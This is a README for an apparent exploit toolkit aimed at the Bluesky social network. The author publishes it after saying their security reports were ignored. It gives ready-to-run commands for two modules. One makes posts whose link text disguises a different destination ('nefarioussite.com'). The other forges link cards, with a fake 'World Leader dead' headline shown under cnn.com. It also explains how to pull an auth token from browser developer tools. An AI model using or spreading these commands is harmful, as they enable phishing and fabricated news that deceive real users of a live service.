bsky-exploits

Bluesky

What is this?

This repository contains exploit modules for Bluesky, using a framework that simplifies the creation of new modules as new exploits are discovered.

Why?

I have discovered a number of security vulnerabilities in Bluesky and atproto. Each time I've found something new, I've chosen to report it to Bluesky at security@bsky.app, as requested at https://bsky.app/.well-known/security.txt, and provide them with details.

Bluesky has responded to only one of these reports, one time, 4 days after submission, saying "We appreciate the report, and we'll be taking a closer look at the issue.". They did not follow up on that report and they have not responded to any of my other reports.

One particular issue that I first reported a month earlier was reported to Bluesky again, separately and unknowingly, by a second security researcher and a partial fix was committed later that day; however, Bluesky did not follow up with me to verify that the commit fully solved the issue (it did not) and there has been no acknowledgement publicly or privately of my contributions.

As a security researcher, I take security extremely seriously. It has become apparent to me that Bluesky does not take it quite so seriously.

Bluesky has been made aware on numerous occasions that the safety of all Bluesky users has been and continues to be at risk, yet they choose to do nothing.

If releasing tools to exploit these issues is what it takes to ensure that Bluesky begins to take security seriously and actually keep their users safe, then so be it. This is not the route I wanted to go, but they forced my hand.

It's written in TypeScript? Really?

Yes. Fight me. I threw it all together in a single evening (with eslint and prettier, even) -- you shouldn't really expect much from this.

Exploit List

post-disguised-link

yarn start exploit pdl --auth-token '...' --post 'Benign text with fake URL: https://google.com/search?q=puppies' --uri 'https://nefarioussite.com/' --start 27 --length 35

Creates a post with the text --post, which contains a disguised link to --uri, using --length characters starting from --start as the link text.

Jason Parker @handle.invalid · 12m
Benign text with fake URL: https://google.com/search?q=puppies

post-fake-link-card

yarn start exploit pflc --auth-token '...' --post 'Wow, neat.' --uri 'https://cnn.com/' --title 'World Leader dead at 42.' --description 'According to their spokesperson, World Leader was found dead in their home on Tuesday night. They were 42.'

Creates a post with the text --post, which includes a link card to --uri with a title of --title and description of --description.
Note: Link cards can contain arbitrary thumbnails, but they are not currently supported here.

Jason Parker @handle.invalid · 12m
Wow, neat.

cnn.com
World Leader dead at 42.
According to their spokesperson, World Leader was found dead in their home on Tuesday night. They were 42.

How?

yarn build to build.
yarn start for a list of commands.
yarn start exploit to show a list of available modules.
yarn start exploit <name> [args...] to execute a particular exploit.

--auth-token can be obtained from the Authorization header, via Developer Tools in a web browser. The authorization scheme (Bearer) is added here automatically and should not be included in the argument.

Contact

Jason Parker
Email: north@ꩰ.com
Mastodon: @north@ꩰ.com / @north@fosstodon.org